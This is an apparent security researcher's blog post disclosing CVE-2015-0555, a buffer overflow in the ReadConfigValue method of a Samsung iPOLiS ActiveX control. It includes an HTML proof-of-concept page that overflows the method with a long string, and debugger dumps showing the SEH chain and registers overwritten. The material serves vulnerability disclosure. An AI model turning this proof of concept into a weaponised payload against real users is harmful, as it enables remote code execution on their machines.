Saturday, February 28, 2015

Samsung iPOLiS 1.12.2 XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC

Author: Praveen Darshanam
CVE: 2015-0555
Vulnerable File: "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype: "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName: "ReadConfigValue"
progid/ActiveX: "XNSSDKDEVICELib.XnsSdkDevice"
Operating System: Windows 7 Ultimate N SP1
Vulnerable Software: Samsung iPOLiS 1.12.2

Proof of Concept
<html>
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC </head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var argCount = 1;
var arg1= "";

for (i=0; i<= 4000; i++)
{
 arg1 += "A";
}
target.ReadConfigValue(arg1);

</script>
</html>
Stack Trace
Exception Code: ACCESS_VIOLATION
Disasm: 6492CE MOV AL,[EDI+EDX]

Seh Chain:
--------------------------------------------------
1 41414141

Called From                   Returns To
--------------------------------------------------
XNSSDKDEVICE.6492CE           41414141
41414141                      8ABAB41
8ABAB41                       mfc100.64BA90C1
mfc100.64BA90C1               3D39D016
FFFFFFFE                      mfc100.64AFBE5C

Registers:
--------------------------------------------------
EIP 006492CE
EAX 00000408
EBX 01AD9FB0 -> 0065A564
ECX 00000414
EDX 08ABAB41
EDI 0000009C
ESI 0000009C
EBP 002DEA9C -> Asc: AAAAAAAAA
ESP 002DE7F4 -> 59D56B19 -> Asc: k k

Block Disassembly:
--------------------------------------------------
6492BD MOV ECX,EAX
6492BF XOR ESI,ESI
6492C1 MOV [EBP-298],ECX
6492C7 TEST ECX,ECX
6492C9 JLE SHORT 00649340
6492CB MOV EDX,[EBP+8]
6492CE MOV AL,[EDI+EDX]  <--- crash="" p="">6492D1 CMP AL,2F
6492D3 JNZ SHORT 00649333
6492D5 TEST EDI,EDI
6492D7 JNZ SHORT 00649304
6492D9 PUSH 80
6492DE LEA EAX,[EBP-90]
6492E4 PUSH EDI
6492E5 PUSH EAX

ArgDump:
--------------------------------------------------
EBP+8 08ABAB41
EBP+12 64BA90C1 -> EBE84589
EBP+16 3D39D016
EBP+20 FFFFFFFE
EBP+24 64AFBE5C -> CCCCCCC3
EBP+28 00000018

Stack Dump:
--------------------------------------------------
2DE7F4 19 6B D5 59 08 00 00 00 A0 EA 2D 00 10 92 64 00  [.k.Y..........d.]
2DE804 14 04 00 00 64 65 C4 64 00 00 00 00 00 00 00 00  [....de.d........]
2DE814 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
2DE824 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
2DE834 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]

Exception Code: ACCESS_VIOLATION
Disasm: 41414141 ?????

Seh Chain:
--------------------------------------------------
1 41414141

Called From                   Returns To
--------------------------------------------------
ntdll.77B670B4                ntdll.77BDAB1A
ntdll.77BDAB1A                ntdll.77BB0404
ntdll.77BB0404                ntdll.77B3F956
ntdll.77B3F956                ntdll.77B67017
ntdll.77B67017                41414141
41414141                      8ABAB41
8ABAB41                       mfc100.64BA90C1
mfc100.64BA90C1               3D39D016
FFFFFFFE                      mfc100.64AFBE5C

Registers:
--------------------------------------------------
EIP 77B670B4 -> C0000005
EAX 002DE0EC -> C0000005
EBX 41414141
ECX 41414141
EDX 00000000
EDI 00000000
ESI 002DE0EC -> C0000005
EBP 002DE0D8 -> 002DE40C
ESP 002DE088 -> 77B662A4


Block Disassembly:
--------------------------------------------------
77B6709C MOV [ESP+8],EBX
77B670A0 JMP 77B837AD
77B670A5 LEA ESP,[ESP]
77B670AC LEA ESP,[ESP]
77B670B0 MOV EDX,ESP
77B670B2 SYSENTER
77B670B4 RETN  <--- crash="" p="">77B670B5 LEA ESP,[ESP]
77B670BC LEA ESP,[ESP]
77B670C0 LEA EDX,[ESP+8]
77B670C4 INT 2E
77B670C6 RETN
77B670C7 NOP
77B670C8 PUSH EBP
77B670C9 MOV EBP,ESP


ArgDump:
--------------------------------------------------
EBP+8 002DE0EC -> C0000005
EBP+12 002DE13C -> 00000000
EBP+16 00000000
EBP+20 C0000005
EBP+24 00000001
EBP+28 00000000

P.S. CERT tried to coordinate but there wasn't any response from Samsung